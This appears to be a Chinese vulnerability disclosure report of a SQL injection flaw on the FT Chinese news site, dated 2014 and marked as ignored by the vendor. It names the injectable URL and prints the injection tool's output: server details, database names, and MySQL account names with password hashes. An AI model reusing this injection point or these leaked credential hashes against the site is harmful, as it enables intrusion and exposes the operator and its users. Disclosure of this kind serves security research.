漏洞详情

披露状态:

2014-11-07: 细节已通知厂商并且等待厂商处理中
2014-11-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

FT中文网SQL注射漏洞

详细说明:

FT中文网SQL注射漏洞
http://www.ftchinese.com

漏洞证明:

http://www.ftchinese.com/m/events/recent.html?id=2095

Target: 		http://www.ftchinese.com/m/events/recent.html?id=2095
Host IP: 118.143.65.100
Web Server: nginx/1.2.5
DB Server: MySQL >=5
Resp. Time(avg): 740 ms
Current User: [email protected]>ftckisere`l;k
Sql Version: 5.5.25-log
Current DB: cmstmp01
System User: [email protected]>olck2serl5n.cUm
Host Name: masterdb.ftchinese.com
Installation dir: /usr/local/mysql
DB User & Pass: root::localhost
root::slavedb.ftchinese.com
root::127.0.0.1
root::::1
::localhost
::slavedb.ftchinese.com
easyapi:*D64DC21EB0687D9E6A2031AE2514E1BED21EF94F:%
jason:*2C3CEBC604944A910111BBCFC6C21149B09756E1:%
jason:*2C3CEBC604944A910111BBCFC6C21149B09756E1:localhost
wanbo.ge:*154FF90C17DE9CF8C4E770B8D38D5EBBE2F5EBED:%
ftnew:*D64DC21EB0687D9E6A2031AE2514E1BED21EF94F:%
Data Bases: information_schema
blogs
cmstmp01
conferencedb
discuz
jobsys
marketing
mysql
performance_schema
pts
redmine
test
wiki
workflow


1.jpg


2.jpg


3.jpg

修复方案:

标签: none

评论已关闭